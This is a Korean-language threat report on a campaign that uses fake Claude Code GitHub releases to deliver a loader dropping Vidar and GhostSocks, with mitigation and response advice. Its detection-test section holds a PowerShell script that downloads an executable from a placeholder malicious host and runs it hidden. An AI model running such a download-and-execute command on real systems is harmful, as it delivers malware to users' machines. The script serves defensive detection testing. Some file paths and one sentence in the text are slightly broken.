클로드 코드 루어, GitHub 릴리스를 악성코드 배포 채널로 전환하다

요약

위협 행위자들은 실수로 Anthropic의 Claude 코드 소스를 노출한 잘못 구성된 npm 패키지를 신속히 악용하였습니다. 그들은 Rust로 구축된 로더를 배포하는 트로이화된 7z ‘릴리스’를 호스팅하는 가짜 GitHub 리포지토리를 켰습니다. 실행 후, 드로퍼는 Vidar 인포스틸러와 GhostSocks SOCKS5 프록시를 설치하여 도둑질 및 은밀한 접근을 허용합니다.

조사

조사 결과, 2026년 2월부터 활동 중인 순환적 미끼 운영이 밝혀졌으며, 이는 단명하는 GitHub 계정을 활용하여 악성 릴리스 아티팩트를 게시합니다. 미끼 세트 전반에 걸쳐, 희생자는 TradeAI.exe 페이로드를 수신하며, 이는 내장된 C2 URL을 해독하고, 분석 방지 검사를 수행하며, Vidar와 GhostSocks를 모두 배포합니다. C2 검색은 Steam과 Telegram에 호스팅 된 데드드롭 리졸버를 통해 처리되어 캠페인이 인프라를 빠르게 순환하도록 돕습니다.

완화

조직은 AI 도구 설치를 검증된 소스로 제한하고, 알려진 악성 GitHub 릴리스 링크 및 관련 C2 도메인을 차단하며, 자격 증명 도난 행위를 면밀히 감시해야 합니다. Rust로 컴파일된 드로퍼와 일반적인 Vidar/GhostSocks 실행 패턴에 대한 엔드포인트 탐지를 추가하십시오. 샌드박스 회피 신호에 대한 범위를 강화하고, 스테이징이나 후속 작업에 사용될 수 있는 의심스러운 스크립트 실행(이상한 PowerShell 활동 포함)을 제한하십시오.

대응

발견되면, 엔드포인트를 격리하고, 악성 실행 파일과 연결된 7z 아카이브를 보존하며, 호스트 및 네트워크 전반에서 Vidar 및 GhostSocks 아티팩트를 검색하십시오. 식별된 pastebin 및 snippet.host URL을 차단하고 모든 노출된 자격 증명을 즉시 취소하십시오. 전체 자격 증명 손상 평가를 수행한 후, 특권 계정을 재설정하고 토큰/세션을 무효화하여 재사용을 방지하십시오.

시뮬레이션 실행

사전조건: 테레메트리 & 기본선 프리비행 검사 통과 완료.

이유: 이 섹션은 탐지 규칙을 트리거하도록 설계된 적의 기술(TTP)의 정밀한 실행을 상세히 설명합니다. 명령어 및 내러티브는 반드시 식별된 TTP들과 직접적으로 일치해야 하며, 탐지 논리에 의해 예상되는 정확한 테레메트리를 생성하는 것을 목표로 해야 합니다.

• 공격 내러티브 & 명령어:
  상대방이 악성 링크가 포함된 피싱 이메일(T1566.002)을 수신하여 손상된 GitHub 리포지토리를 호스팅하지 TradeAI.exe 피해자가 링크를 클릭하면, 숨겨진 창에서 PowerShell이 실행됩니다. 스크립트는 드로퍼를 임시 디렉토리에 다운로드하고 실행하며, 드로퍼는 이후 Vidar 스틸러와 GhostSocks 프록시(T1027, T1090.003)를 설치합니다.

• 회귀 테스트 스크립트:

   # -------------------------------------------------
    # TradeAI.exe 드로퍼 실행 시뮬레이션
    # -------------------------------------------------
    $url = "http://malicious.example.com/TradeAI.exe"
    $outPath = "$env:TEMPTradeAI.exe"
  
    # 드로퍼 다운로드 (실제 공격자 행동 모방)
    Invoke-WebRequest -Uri $url -OutFile $outPath -UseBasicParsing
  
    # 드로퍼를 조용히 실행
    Start-Process -FilePath $outPath -WindowStyle Hidden
  
    # OPTIONAL: 하위 프로세스가 생성될 수 있도록 몇 초 기다림
    Start-Sleep -Seconds 5
    # -------------------------------------------------

• 정리 명령어:

   # 다운로드한 드로퍼와 임시 아티팩트 제거
    $outPath = "$env:TEMPTradeAI.exe"
    if (Test-Path $outPath) { Remove-Item $outPath -Force }
  
    # (드로퍼가 추가 파일을 생성한 경우, 필요에 따라 찾아서 삭제)
    # 예: 알려진 페이로드 디렉토리 삭제
    $payloadDir = "$env:APPDATAVidar"
    if (Test-Path $payloadDir) { Remove-Item $payloadDir -Recurse -Force }

검증 & 예상 결과

1. 예상 SIEM 경고: 회귀 스크립트가 실행된 후, SIEM은 경고를 발생시키며 이 경고는 이미지 로 끝납니다. TradeAI.exe (or ClaudeCode_x64.exe). 경고 제목은 규칙의 제목 필드와 일치합니다.
2. 회피 테스트: 다운로드한 바이너리 이름을 TradeAI_renamed.exe 로 변경하고 스크립트를 다시 실행하십시오. 경고가 발생하지 않으며, 이는 규칙이 정적 파일 이름에 의존하고 있음을 확인합니다.

강화 추천

1. 해시 지표 추가: 알려진 악성 드로퍼의 SHA‑256 해시를 규칙에 포함시키십시오(또는 별도의 해시 기반 규칙 만들기).
2. 범위 확장: 비정상적인 위치에서 시작되는 미확인된 바이너리 실행을 모니터링하도록 탐지를 확장하십시오 (예: %TEMP%, %APPDATA%).
3. 행동 상관: 프로세스 생성과 이후 알려진 GhostSocks C2 도메인으로의 네트워크 연결 및 알려진 Vidar 구성 요소의 파일 작성과 상관관계를 설정합니다.
4. 엔드포인트 시행: 사용자 작성 가능 디렉토리에서 서명되지 않은 바이너리 실행을 차단하기 위해 AppLocker 또는 Windows Defender Application Control을 배포하십시오.

보고서 끝